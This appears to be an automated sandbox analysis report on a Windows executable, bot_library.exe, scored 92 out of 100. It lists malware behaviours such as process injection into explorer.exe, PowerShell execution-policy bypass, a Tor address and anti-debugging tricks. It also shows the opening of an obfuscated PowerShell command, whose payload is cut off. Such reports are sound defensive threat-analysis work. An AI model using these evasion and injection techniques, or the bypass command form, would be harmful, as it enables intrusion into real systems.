Windows
Analysis Report
bot_library.exe
Overview
General Information
Detection
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Found Tor onion address
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Injects a PE file into a foreign process
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Tor Client/Browser Execution
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number, etc.) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64native
- bot_library.exe (PID: 8104, cmdline: "C:\Users\user\Desktop\bot_library.exe", MD5: 1F669CE249A053178531A1F2009F150B)
- conhost.exe (PID: 8112, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
- powershell.exe (PID: 7452, cmdline:
"powershell" -NoProfile -ExecutionPolicy Bypass -Command "function Get-Delegate { ... (the remainder is a long [char]-concatenation obfuscated PowerShell payload that is cut off on the page and is not reproduced here)